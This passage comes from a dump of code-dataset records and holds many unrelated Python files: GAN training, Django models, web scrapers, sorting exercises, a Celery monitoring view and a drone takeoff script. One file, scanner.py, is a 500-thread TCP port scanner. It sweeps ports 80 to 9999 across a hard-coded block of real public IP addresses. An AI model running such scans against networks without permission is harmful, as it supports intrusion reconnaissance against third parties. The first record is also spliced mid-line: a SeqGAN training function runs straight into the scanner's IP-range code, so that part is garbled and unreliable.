Path\nfrom data_utils.utils import Config, CheckpointManager, SummaryManager\nimport json\n\nfrom data_utils.vocab_tokenizer import Vocabulary\nfrom sklearn.model_selection import train_test_split\nfrom transformers import BertTokenizer, BertModel, AdamW, BertPreTrainedModel,get_linear_schedule_with_warmup,get_cosine_with_hard_restarts_schedule_with_warmup\nimport pandas as pd\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom model.discriminator import BertDiscriminator\nfrom model.seqgan import DiscriminatorDatasetReader, collate_fn, load_generator, save_generator, train_discriminator, evaluate_discriminator, prepaire_D_dataset, prepaire_D_optimizer, prepaire_D_scheduler\nfrom model.seqgan import load_discriminator, prepaire_G_dataset, train_generator, save_discriminator\n\nfrom model.optim import GradualWarmupScheduler\nfrom evaluate import evaluate\nfrom metric import acc\n\ndef train_discriminator_with_gen(discriminator, genenrator, real_data):\n genenrator.switch_mode('eval')\n data_itr = real_data.sample(frac=0.4)\n d_steps = 2\n for d_step in range(d_steps):\n # 构建正负样本数据集\n inputs = []\n outputs = []\n for data in data_itr:\n print(data)\n qustion = str(data['question'])\n inputs.append(qustion)\n outputs.append(str(data['answer']))\n corpus = pd.DataFrame({'question':inputs,'answer': outputs}).sample(frac=1)\n BATCH_SIZE = 8\n train_iterator, dev_iterator = prepaire_D_dataset(corpus,genenrator, batch=BATCH_SIZE)\n # 开始训练D\n EPOCH_NUM = 2\n optimizer = prepaire_D_optimizer()\n scheduler = prepaire_D_scheduler(optimizer, EPOCH_NUM, len(train_iterator))\n train_discriminator(discriminator, train_iterator, optimizer, scheduler)\n evaluate_discriminator(discriminator, dev_iterator)\n\ndef train_generator_with_discr(generator, discriminator, data_iterator, val_iterator, ignore_padid, tokenizer=None, checkpoint_manager=None):\n g_steps = 2\n losses = []\n loss_fn = nn.CrossEntropyLoss(ignore_index=generator.vocab.PAD_ID)\n for step in range(g_steps):\n BATCH_SIZE = 8\n # optim\n opt = optim.Adam(params=generator.parameters(), lr=generator.learning_rate) # torch.optim.SGD(params=model.parameters(), lr=model_config.learning_rate)\n # scheduler = ReduceLROnPlateau(opt, patience=5) # Check\n epoch_size = generator.config.epochs//20 # 降低一半\n scheduler = GradualWarmupScheduler(opt, multiplier=8, total_epoch=epoch_size)\n for epoch in range(epoch_size):\n scheduler.step(epoch)\n # 1. generator 生成样本pred[batch_size, seq_len, word_emb]\n dataset = generator.sample(data_iterator)\n print('sample finish')\n # 2. discriminator根据样本[batch_size, seq_len]生成奖励[batch_size,reward]\n D_iterater = prepaire_D_dataset(dataset,generator=None,shuffle=False)\n print('prepaire_D_dataset finish')\n # print(dataset['question'])\n rewards = discriminator.reward(D_iterater)\n print('reward finish: ', len(rewards), len(dataset))\n # 3. 利用pred[batch_size, seq_len, word_emb], pred[batch_idx][t]表示第batch_idx个句子在0:t-1条件下的log(P(y_t|Y_1:Y_{t-1}))\n # 然后利用公式计算loss\n # for t in [0:seq_len]:\n # loss = -pred[batch_idx][t]*Q[batch_idx]\n # loss/batch_size\n G_iterator = prepaire_G_dataset(dataset,tokenizer,shuffle=True,rewards=rewards)\n # print('len of train: ',len(G_iterator))\n loss, acc_val = train_generator(generator, G_iterator, opt, discriminator, ignore_padid, tokenizer)\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n generator.eval()\n val_summary = evaluate(generator.seq2seq, val_iterator, {'loss': loss_fn, 'acc':acc}, device, tokenizer)\n val_loss = val_summary['loss']\n tqdm.write('epoch : {}, step : {}, '\n 'tr_loss: {:.3f}, val_loss: {:.3f}, tr_acc: {:.2%}, val_acc: {:.2%}'.format(epoch + 1, step,\n loss,\n val_summary['loss'], acc_val,\n val_summary['acc']))\n \n state = {'epoch': epoch + 1,\n 'model_state_dict': generator.get_state_dict(),\n 'opt_state_dict': opt.state_dict()}\n checkpoint_manager.save_checkpoint(state,'seqGAN.tar')\n print('Loss: ',loss)\n losses.append(loss)\n print(losses)\n\ndef D_step(corpus, generator, discriminator, EPOCH_NUM, model_dir):\n train_iterator, dev_iterator = prepaire_D_dataset(corpus, generator)\n optimizer = prepaire_D_optimizer()\n scheduler = prepaire_D_scheduler(optimizer, EPOCH_NUM, len(train_iterator))\n losses = []\n history_acc = []\n last_acc = 0\n discriminator_dir = model_dir + '/../discriminator_model/'\n for i in range(EPOCH_NUM-1):\n print('=' * 50, f\"EPOCH {i+1}\", '=' * 50)\n tl = train_discriminator(discriminator, train_iterator, optimizer, scheduler)\n losses.append(tl)\n el,r = evaluate_discriminator(discriminator, dev_iterator)\n print(f\"Train loss {tl}\")\n print(f\"accuracy {r}\")\n print(f\"Evaluate loss {el}\")\n history_acc.append(r)\n # val_losses.append(l)\n # rocs.append(r)\n if last_acc= 255 or x4 == 0:\n x4 = 1\n if x3 >= 255 or x3 == 0:\n x3 = 1\n if x2 >= 255 or x2 == 0:\n x2 = 1\n x1 += 1\n else:\n x2 += 1\n else:\n x3 += 1\n else:\n x4 += 1\n return ip_list\n\nclass Scanner(Thread):\n def __init__(self, ip):\n Thread.__init__(Thread)\n self.ports = range(80, 9999)\n self.ip = ip\n #end constructor\n\n def run(self):\n for port in self.ports:\n ouvert = self.check_port(port)\n if ouvert:\n print(self.ip, port, ouvert)\n #end run\n\n def check_port(self, port):\n ouvert = True\n #AF_INET: adresse ipv4 ou nom de domaine\n #SOCK_STREAM: TCP\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n try:\n sock.connect((self.ip, port))\n except OSError as e:\n ouvert = False\n return ouvert\n #end check_port\n#end class Scanner\n\nips = ip_range(\"41.87.128.1\", \"41.87.159.255\")\n\nsocket.setdefaulttimeout(15)\n\nMAX_THREADS = 500\n\nfor ip in ips:\n while active_count() >= MAX_THREADS:\n time.sleep(5)\n Scanner(ip).start()\n","sub_path":"scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"591727491","text":"#!usr/bin/python\n\n\"\"\"Create a function to calculate the average processing time for importing flagstat data into a sqlite3 database.\"\"\"\n\nimport sys\nimport pprint as pp\nimport sqlite3\nimport os\n\ndef time_flagstat (timefile, db_dir):\n\n times = {}\n per_flagstat_times = []\n per_runfolder_times = []\n all_runfolders_times = []\n database_create_times = []\n\n with open(os.path.join(db_dir, 'average_time.txt'), 'w+') as timetext:\n timetext.write(\"\")\n\n with open (timefile) as file_handle:\n for line in file_handle:\n # strip out the spaces at the end of each line.\n fields = line.strip().split(\" \")\n if \"from\" in fields:\n per_flagstat_times.append(fields[-1])\n \n if \"runfolder\" in fields:\n per_runfolder_times.append(fields[-1])\n \n if \"all\" in fields and \"data\" in fields:\n with open(os.path.join(db_dir, 'average_time.txt'), 'a+') as timetext:\n timetext.writelines(\"time to import all runfolders: {}\\n\".format(fields[-1]))\n all_runfolders_times.append(fields[-1])\n\n if \"create\" in fields and \"database\" in fields:\n database_create_times.append(fields[-1])\n\n #print (per_flagstat_times)\n #print (per_runfolder_times)\n #print (all_runfolders_times)\n\n per_flagstat_time = sum([float(x) for x in per_runfolder_times])/len(per_flagstat_times)\n per_runfolder_time = sum([float(x) for x in per_runfolder_times])/len(per_runfolder_times)\n all_runfolders_time = sum([float(x) for x in all_runfolders_times])/len(all_runfolders_times)\n database_create_time = sum([float(x) for x in database_create_times])/len(database_create_times)\n\n with open(os.path.join(db_dir, 'average_time.txt'), 'a+') as timetext:\n timetext.writelines(\"number of flagstat imported: {}\\n average time taken to import one flagstat: {}\\n\".format(len(per_flagstat_times), per_flagstat_time))\n timetext.writelines(\"number of runfolders imported: {}\\n average time taken to import each runfolder: {}\\n\".format(len(per_runfolder_times), per_runfolder_time))\n timetext.writelines(\"number of times all runfolders imported: {}\\n average time taken to import all runfolders: {}\\n\".format(len(all_runfolders_times), all_runfolders_time))\n timetext.writelines(\"number of times database were created: {}\\n average time taken to create a database: {}\\n\".format(len(database_create_times), database_create_time))\n\n times[\"a_flagstat\"] = per_flagstat_time\n times[\"a_runfolder\"] = per_runfolder_time\n times[\"all_runfolders\"] = all_runfolders_time\n times[\"a_database\"] = database_create_time\n \n for key, value in sorted(times.items()):\n print (key, value)\n \n return times\n\ndef main(timefile):\n\n db_dir = os.path.dirname(os.path.abspath(timefile))\n\n # call the function to print the number to terminal and save them in average_time.txt\n time_flagstat(timefile, db_dir)\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n\n\"\"\"From terminal navigate to the directory where the script is stored, \n \n enter \"python average_time.py\", followed by the filepath to the time.txt file to calculate the average time taken to import flagstat data\n e.g. /mnt/storage/home/zhengt/djangoproject/djangoproject2/flagstat_db/time.txt\"\"\"\n","sub_path":"average_time.py","file_name":"average_time.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"294498070","text":"from django.db import models\nimport uuid\n\n\nclass CategoryManager(models.Manager):\n '''\n Manager for Category\n '''\n\n def get_queryset(self):\n return super(\n CategoryManager,\n self\n ).get_queryset().select_related('parent', 'channel')\n\n\nclass Category(models.Model):\n '''\n This model represent a category on databse.\n Categories can be any general or comprehensive division.\n E.g: Games > XBOX > Adventure...\n '''\n\n objects = CategoryManager()\n\n uuid = models.CharField(\n default=uuid.uuid4,\n unique=True,\n max_length=36\n )\n\n name = models.CharField(\n max_length=255,\n )\n\n channel = models.ForeignKey(\n 'Channel',\n on_delete=models.CASCADE\n )\n\n parent = models.ForeignKey(\n 'Category',\n blank=True,\n null=True,\n on_delete=models.CASCADE\n )\n\n created_at = models.DateTimeField(\n auto_now_add=True\n )\n\n class Meta:\n verbose_name = 'Category'\n verbose_name_plural = 'Categories'\n ordering = ('created_at', )\n\n def __str__(self):\n path = [self.name]\n next_parent = self.parent\n\n while next_parent is not None:\n path.append(self.parent.name)\n next_parent = next_parent.parent\n\n path.append(self.channel.name)\n\n return ' > '.join(path[::-1])\n\n\nclass ChannelManager(models.Manager):\n '''\n Manager for Channel\n '''\n\n def get_queryset(self):\n return super(\n ChannelManager,\n self\n ).get_queryset().prefetch_related('category_set')\n\n\nclass Channel(models.Model):\n '''\n This model represent a channel on databse.\n A channel is a way of making a product available.\n E.g: Submarino marketplace, Americanas marketplace...\n '''\n\n objects = ChannelManager()\n\n uuid = models.UUIDField(\n default=uuid.uuid4,\n unique=True\n )\n\n name = models.CharField(\n max_length=255,\n )\n\n created_at = models.DateTimeField(\n auto_now_add=True\n )\n\n class Meta:\n verbose_name = 'Channel'\n verbose_name_plural = 'Channels'\n ordering = ('created_at', )\n\n def __str__(self):\n return self.name\n","sub_path":"work-at-olist/channels/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"430140043","text":"\"\"\"\nJinja2 renderer and black formatter.\n\"\"\"\nfrom pathlib import Path\nfrom typing import Optional\n\nimport black\nfrom black import NothingChanged, InvalidInput\n\nfrom mypy_boto3_builder.constants import TEMPLATES_PATH, LINE_LENGTH\nfrom mypy_boto3_builder.service_name import ServiceName\nfrom mypy_boto3_builder.structures.package import Package\nfrom mypy_boto3_builder.jinja_manager import JinjaManager\n\n\ndef blackify(content: str, file_path: Path, fast: bool = True) -> str:\n \"\"\"\n Format `content` with `black` if `file_path` is `*.py` or `*.pyi`.\n\n On error writes invalid `content` to `file_path` to check for errors.\n\n Arguments:\n content -- Python code to format.\n file_path -- Target file path.\n fast -- Whether to skip AST post-check.\n\n Returns:\n Formatted python code.\n\n Raises:\n ValueError -- If `content` is not a valid Python code.\n \"\"\"\n if file_path.suffix not in (\".py\", \".pyi\"):\n return content\n\n file_mode = black.FileMode(\n is_pyi=file_path.suffix == \".pyi\", line_length=LINE_LENGTH\n )\n try:\n content = black.format_file_contents(content, fast=fast, mode=file_mode)\n except NothingChanged:\n pass\n except (IndentationError, InvalidInput) as e:\n file_path.write_text(content)\n raise ValueError(f\"Cannot parse {file_path}: {e}\")\n\n return content\n\n\ndef render_jinja2_template(\n template_path: Path,\n package: Optional[Package] = None,\n service_name: Optional[ServiceName] = None,\n) -> str:\n \"\"\"\n Render Jinja2 template to a string.\n\n Arguments:\n template_path -- Relative path to template in `TEMPLATES_PATH`\n module -- Module record.\n service_name -- ServiceName instance.\n\n Returns:\n A rendered template.\n \"\"\"\n template_full_path = TEMPLATES_PATH / template_path\n if not template_full_path.exists():\n raise ValueError(f\"Template {template_path} not found\")\n\n template = JinjaManager.get_environment().get_template(template_path.as_posix())\n return template.render(package=package, service_name=service_name)\n","sub_path":"builder/mypy_boto3_builder/writers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"83322169","text":"from spiderRedis import myredis as spider_redis\nimport requests\nimport time\nfrom bs4 import BeautifulSoup\nimport common\nimport sys\nfrom DB.Db import Db as mysql\n\n\n'''从队列里消费数据'''\ndef consumer(eqKey):\n\tlink = spider_redis.pop(eqKey).decode('ascii')\n\tprint(link)\n\tr = requests.get(link)\n\tsp = BeautifulSoup(r.text, 'lxml')\n\n\t# 获取标题\n\tapp_name = sp.find(\"div\", class_='apphub_AppName').text.replace('\\'','\\\\\\'').replace('\"','\\\"').strip()\n\t# 获取描述\n\tintro = sp.find(\"div\", class_='game_area_description').text.replace('\\'','\\\\\\'').replace('\"','\\\"').strip()\n\tappId = link.split('/')[4]\n\n\tdata = {\n\t\t\"appId\" : appId, \"app_name\" : app_name, 'intro' : intro, 'link' : link\n\t}\n\tdb = mysql(\"app\")\n\tdb.insert(data)\n\n\nif __name__ == \"__main__\":\n\tspider_redis = spider_redis.spiderRedis()\n\tif len(sys.argv) == 1:\n\t\tprint(\"请输入 要消费的队列 !\")\n\t\tprint(\"总共有这么几个队列:\")\n\t\tprint(spider_redis.smembers(common.eq_sets_key))\n\t\texit()\n\n\teqKey = sys.argv[1]\n\ti = 0\n\twhile True:\n\t\tif i == 0:\n\t\t\tprint(\"======================== 消费队列:%s ========================\" % eqKey)\n\n\t\tif i == 20:\n\t\t\ti = 0\n\t\telse:\n\t\t\ti += 1\n\n\t\tif spider_redis.getListLen(eqKey) == 0:\n\t\t\tprint(\"\t队列没有数据,休眠15秒...\")\n\t\t\ttime.sleep(15)\n\t\t\tcontinue\n\n\t\tconsumer(eqKey)\n\t\t","sub_path":"spider/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"85881409","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n\nsetuptools.setup(\n name=\"python_homie4\",\n version=\"1.0.0\",\n description=\"Homie 4.0.0 Implementation\",\n author=\"Michael Cumming, Juuso Korhonen\",\n author_email=\"mike@4831.com, juusokorhonen on github.com\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/juusokorhonen/python_homie4\",\n keywords=[\"HOMIE\", \"MQTT\"],\n packages=setuptools.find_packages(exclude=(\"tests\", \"examples\", )),\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n install_requires=[\n \"paho-mqtt>=1.3.0\",\n \"netifaces>=0.10.6\"],\n extras_require={\n 'dev': [\n 'pycodestyle',\n 'flake8',\n 'pytest',\n 'pytest-flake8',\n 'pytest-pycodestyle',\n ]\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"412434919","text":"\"\"\"\nurl = http://www.jmfc.com.cn/index/caid-2/addno-1/page-1.html\ncity : 荆门\nCO_INDEX : 24\n小区数量:345\n\"\"\"\nfrom backup.comm_info import Comm, Building, House\nfrom backup.get_page_num import AllListUrl\nfrom backup.producer import ProducerListUrl\nimport requests, re\n\nurl = 'http://www.jmfc.com.cn/index/caid-2/addno-1/page-1.html'\nco_index = '24'\ncity = '荆门'\n\n\nclass Jingmen(object):\n def __init__(self):\n self.headers = {\n 'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119Safari/537.36'\n }\n\n def start_crawler(self):\n b = AllListUrl(first_page_url=url,\n request_method='get',\n analyzer_type='regex',\n encode='gbk',\n page_count_rule='>>>.*?href=\".*?page-(.*?)\\.html',\n )\n page = b.get_page_count()\n for i in range(1, int(page) + 1):\n all_url = 'http://www.jmfc.com.cn/index/caid-2/addno-1/page-' + str(i) + '.html'\n p = ProducerListUrl(page_url=all_url,\n request_type='get', encode='gbk',\n analyzer_rules_dict=None,\n current_url_rule=\"/html/body/div[5]/div[6]/div/div[2]/h3/a/@href\",\n analyzer_type='xpath',\n headers=self.headers)\n comm_url_list = p.get_current_page_url()\n self.get_comm_info(comm_url_list)\n\n def get_comm_info(self, comm_url_list):\n for i in comm_url_list:\n try:\n comm = Comm(co_index)\n comm.co_id = '楼盘首页.*?aid-(.*?)/'\n comm.co_name = 'class=\"ls\">(.*?)<'\n comm.co_type = '物业类型(.*?)<'\n comm.area = '区域所属:(.*?)<'\n comm.co_green = '绿 化 率:(.*?)<'\n comm.co_volumetric = '容 积 率:(.*?)<'\n comm.co_build_type = '楼       层:(.*?)<'\n comm.co_size = '占地面积:(.*?)<'\n comm.co_build_size = '建筑面积:(.*?)<'\n comm.co_develops = '开  发  商:<.*?target=\"_blank\">(.*?)<'\n comm.co_address = '项目地址:(.*?)<'\n data_list = comm.to_dict()\n p = ProducerListUrl(page_url=i,\n request_type='get', encode='gbk',\n analyzer_rules_dict=data_list,\n current_url_rule='colspan=\"3\" align=\"right\">(.*?)<', html, re.S | re.M)\n ho_true_size_list = re.findall('width=\"35%\".*?房号:.*?(.*?)<', html, re.S | re.M)\n ho_type_list = re.findall('width=\"35%\".*?房号:.*?(.*?)<', html, re.S | re.M)\n for i in range(0, len(ho_name_list)):\n try:\n house = House(co_index)\n house.ho_name = ho_name_list[i].strip()\n house.ho_true_size = ho_true_size_list[i].strip()\n house.ho_type = ho_type_list[i].strip()\n house.bu_id = bu_id\n house.insert_db()\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n","sub_path":"hilder_gv/crawler/jingmen_24.py","file_name":"jingmen_24.py","file_ext":"py","file_size_in_byte":5575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"212379384","text":"# TO-DO: complete the helper function below to merge 2 sorted arrays\ndef merge(arrA, arrB):\n elements = len(arrA) + len(arrB)\n merged_arr = [None] * elements\n\n # Your code here\n while None in merged_arr:\n if not arrA:\n popped = arrB.pop(0)\n first_instance = merged_arr.index(None)\n merged_arr[first_instance] = popped\n elif not arrB:\n popped = arrA.pop(0)\n first_instance = merged_arr.index(None)\n merged_arr[first_instance] = popped\n elif arrA[0] < arrB[0]:\n popped = arrA.pop(0)\n first_instance = merged_arr.index(None)\n merged_arr[first_instance] = popped\n elif arrB[0] < arrA[0]:\n popped = arrB.pop(0)\n first_instance = merged_arr.index(None)\n merged_arr[first_instance] = popped\n else:\n continue\n\n return merged_arr\n\n# TO-DO: implement the Merge Sort function below recursively\ndef merge_sort(arr):\n # base case\n if len(arr) == 0 or len(arr) == 1:\n return arr \n # recursive case\n elif len(arr) == 2:\n return merge([arr[0]], [arr[1]])\n else: \n middle = (len(arr) - 1) // 2\n left = arr[:middle]\n right = arr[middle:]\n \n return merge(merge_sort(left), merge_sort(right))\n\n return arr\n\n# STRETCH: implement the recursive logic for merge sort in a way that doesn't \n# utilize any extra memory\n# In other words, your implementation should not allocate any additional lists \n# or data structures; it can only re-use the memory it was given as input\ndef merge_in_place(arr, start, mid, end):\n swapped = False\n \n while True:\n swapped = False\n for i in range(start, end):\n if arr[i] > arr[i + 1]:\n arr[i], arr[i + 1] = arr[i + 1], arr[i]\n swapped = True\n if swapped == False:\n break\n \n return arr\n\ndef merge_sort_in_place(arr, l, r):\n # base case\n if l < r: \n middle = l + (r - l) // 2\n merge_sort_in_place(arr, l, middle)\n merge_sort_in_place(arr, middle + 1, r)\n merge_in_place(arr, l, middle, r)\n\n return arr\n","sub_path":"src/sorting/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"66647725","text":"# Cells with Odd Values in a Matrix\n\n# There is an m x n matrix that is initialized to all 0's. There is also a 2D\n# array indices where each indices[i] = [ri, ci] represents a 0-indexed location\n# to perform some increment operations on the matrix.\n\n# For each location indices[i], do both of the following:\n\n# Increment all the cells on row ri.\n# Increment all the cells on column ci.\n# Given m, n, and indices, return the number of odd-valued cells in the matrix\n# after applying the increment to all locations in indices.\n\n# Example 1:\n\n\n# Input: m = 2, n = 3, indices = [[0,1],[1,1]]\n# Output: 6\n# Explanation: Initial matrix = [[0,0,0],[0,0,0]].\n# After applying first increment it becomes [[1,2,1],[0,1,0]].\n# The final matrix is [[1,3,1],[1,3,1]], which contains 6 odd numbers.\n\nclass Solution:\n def oddCells(self, n: int, m: int, indices: List[List[int]]) -> int:\n rows = [0 for num in range(n)]\n cols = [0 for num in range(m)]\n for index in indices:\n rows[index[0]] += 1\n cols[index[1]] += 1\n result = 0\n for i in range(n):\n for j in range(m):\n if (rows[i] + cols[j]) % 2 != 0:\n result += 1\n return result","sub_path":"easy/cells_with_odd_values_in_a_matrix.py","file_name":"cells_with_odd_values_in_a_matrix.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"437973231","text":"\"\"\"\n\nNOTE: be sure to be using the latest dronekit. \nsudo pip uninstall dronekit\nsudo pip uninstall pymavlink\n\ncd dronekit-python\ngit pull\n\nsudo python setup.py build\nsudo python setup.py install\n\nBe sure the RASPI CAMERA driver is correctly acivated -> type the following\nmodprobe bcm2835-v4l2 \n\n\n\"\"\"\nfrom os import sys, path\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n\nimport time\nimport math\nimport argparse\n\n\nfrom dronekit import connect, VehicleMode, LocationGlobalRelative, Command, LocationGlobal\nfrom pymavlink import mavutil\nfrom opencv.lib_aruco_pose import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--connect', default = '')\nargs = parser.parse_args()\n \n#--------------------------------------------------\n#-------------- FUNCTIONS \n#--------------------------------------------------\n#-- Define arm and takeoff\ndef arm_and_takeoff(altitude):\n\n print(\"Arming motors\")\n vehicle.mode = VehicleMode(\"GUIDED\")\n vehicle.armed = True\n\n while not vehicle.armed: time.sleep(1)\n\n print(\"Taking Off\")\n vehicle.simple_takeoff(altitude)\n\n while True:\n v_alt = vehicle.location.global_relative_frame.alt\n print(\">> Altitude = %.1f m\"%v_alt)\n if v_alt >= altitude - 1.0:\n print(\"Target altitude reached\")\n break\n time.sleep(1)\n \n#--------------------------------------------------\n#-------------- CONNECTION \n#-------------------------------------------------- \n#-- Connect to the vehicle\nprint('Connecting...')\n\nconnection_string = \"/dev/ttyS0\"\nbaud_rate = 921600\nvehicle = connect(connection_string, baud = baud_rate, wait_ready=True) \nprint('connected!')\n\n#--------------------------------------------------\n#-------------- CONNECTION \n#-------------------------------------------------- \narm_and_takeoff(1.5)\n\ntime.sleep(3)\n\nprint (\" --> Commanding to LAND\")\nvehicle.mode = \"LAND\"\n\n","sub_path":"scripts/arm_takeoff_to_test.py","file_name":"arm_takeoff_to_test.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"251045439","text":"def reverse(x):\n res = 0\n remain = abs(x)\n while remain:\n res = res * 10 + remain % 10\n remain //= 10\n return res if x > 0 else -res\n\n\ndef main():\n val = 1019\n print(val)\n rev = reverse(val)\n print(rev)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"reverse_int.py","file_name":"reverse_int.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"364594715","text":"from django.core.paginator import Paginator\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\n# Create your views here.\nfrom pymysql import connect\nfrom sshtunnel import SSHTunnelForwarder\nfrom pymysql import connect\nfrom sshtunnel import SSHTunnelForwarder\n#from monitor.tasks import add\nfrom ZxWebTest import settings\nfrom mycelery.sms.tasks import send_sms,send_sms2\nfrom mycelery.cms2.tasks import chains_check\nfrom datetime import timedelta\nfrom datetime import datetime\n#from django_celery_beat.models import PeriodicTask #倒入插件model\n\n\n\n\ndef view(request):\n \"\"\"生产者\"\"\"\n ################################# 异步任务\n\n # 1. 声明一个和celery一模一样的任务函数,但是我们可以导包来解决\n #chains_check.delay()\n #send_sms.delay(\"110\")\n send_sms2.delay(\"119\")\n #send_sms.delay() #如果调用的任务函数没有参数,则不需要填写任何内容\n print('-------------')\n return JsonResponse({\"status\": 0})\n\n\n\n#\n# def crontab(request):\n#\n# ################################ 定时任务\n#\n# ctime = datetime.now()\n# # 默认用utc时间\n# utc_ctime = datetime.utcfromtimestamp(ctime.timestamp())\n# time_delay = timedelta(seconds=10)\n# task_time = utc_ctime + time_delay\n# result = send_sms.apply_async([\"911\", ], eta=task_time)\n# print(result.id)\n# return JsonResponse({\"status\": 'ok'})\n\n#\n# def cms2_task_list(request):\n# #page = request.GET.get('page');\n# # if page:\n# # page=int(page);\n# # else:\n# # page=1;\n#\n# tasks = PeriodicTask.objects.all()\n# print(tasks)\n# # paginator = Paginator(tasks, settings.PAGE_SIZE)\n# # task_list = []\n# return JsonResponse({\"data\":tasks})\n\n\n\n\n\n\n\ndef db_content(sql_sentence):\n server = SSHTunnelForwarder(\n ssh_address_or_host=('xxx', 22), # 指定SSH中间登录地址和端口号\n ssh_username='root', # 指定地址B的SSH登录用户名\n ssh_password='xxx', # 指定地址B的SSH登录密码\n remote_bind_address=('xxxx', 3306) # 指定最终目标C地址,端口号为mysql默认端口号3306\n )\n server.start()\n\n db = connect(\n host='127.0.0.1', # 此处必须是是127.0.0.1\n port=server.local_bind_port,\n user='xxx',\n passwd='xxxx',\n db='xxx')\n print(\"端口:\" + str(server.local_bind_port))\n\n cursor = db.cursor()\n # print(cursor)\n\n db.ping(reconnect=True)\n cursor.execute(sql_sentence)\n results = cursor.fetchall()\n # print(results)\n server.close()\n return results\n\n\ndef chains(request):\n results = db_content('xxx')\n if results:\n print('fail')\n list1 = list(results)\n list_result = []\n for i in list1:\n a = i.__str__().replace(',', '').strip('()')\n list_result.append(a)\n print(list_result)\n return JsonResponse({\"status\": 0, \"message\": list_result})\n else:\n return JsonResponse({\"status\": 0, \"message\": '无异常!'})\n\n\n\n\n\n\n","sub_path":"monitor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"465409533","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport math\nimport sys\nimport codecs\n\nJOULE_PER_CAL = 4.184\n\nclass Atom:\n \"\"\"An atom class\"\"\"\n def __init__(self, charge, lj):\n self.charge = charge\n self.epsilon = lj[0]\n self.sigma = lj[1]\n\n def __str__(self):\n return ('charge' + str(self.charge) + '\\n' \n 'epsilon' + str(self.epsilon) + '\\n'\n 'sigma' + str(self.sigma))\n\n def display(self):\n print('charge:' + str(self.charge) + ' ' \n 'epsilon:' + str(self.epsilon) + ' '\n 'sigma:' + str(self.sigma))\n\n# def __eq__(self, other):\n# return (self.charge == other.charge and \n# self.epsilon == other.epsilon and\n# self.sigma == other.sigma)\n\nclass Molecule:\n \"\"\"A molecule class\"\"\"\n def __init__(self, atoms):\n self.sites = atoms\n\n def __str__(self):\n return ('sites ' + str(len(self.sites)) + '\\n' +\n str(self.sites))\n\n def display(self):\n print('*** start print molecule ***')\n print('sites', str(len(self.sites)))\n for atom in self.sites:\n atom.display()\n print('*** end print molecule **')\n \n# def __eq__(self, other):\n# return self.sites == other.sites\n\nclass System:\n \"\"\"A system class\"\"\"\n def __init__(self, volume, solute, solvent, slvNum):\n self.volume = volume\n self.solute = solute\n self.solvent = solvent\n self.slvNum = dict(zip(solvent, slvNum))\n self.slvNumDensity = dict(zip(solvent, [self.slvNum[slv] / volume for slv in solvent]))\n\n def __str__(self):\n return ('volume ' + str(self.volume) + '\\n'\n 'solute\\n' +\n str(self.solute) + '\\n'\n 'solvent ' + str(len(self.solvent)) + '\\n' +\n str(self.solvent) + '\\n' +\n 'solvent number' + '\\n' +\n str(self.slvNum) + '\\n' +\n 'solvent numDensity\\n' + \n str(self.slvNumDensity))\n \n def display(self):\n print('***** start print system *****')\n print('volume ', self.volume)\n print('solute')\n self.solute.display()\n print('solvent ', len(self.solvent))\n for slv in self.solvent:\n print('number', self.slvNum[slv])\n print('numDensity', self.slvNumDensity[slv])\n slv.display()\n print('***** end print system *****')\n\n #obsolete (incomplete)\n# def getElrc_Karino(self, rs, rc):\n# elrc = {}\n# for slv in self.solvent:\n# for slvSite in slv.sites:\n# for sltSite in self.solute.sites:\n# ep = math.sqrt(slvSite.epsilon * sltSite.epsilon)\n\n\n def getElrc(self, vtype, rs, rc):\n if vtype == 'Switch':\n pass\n elif vtype == 'Cut-off':\n rs = rc\n else: \n sys.exit(\"Sorry, the vdwtype = \" + vtype + \" has not been implemented, yet.\\n\"\n \"Currently only vdwtype = Cut-off or Switch is 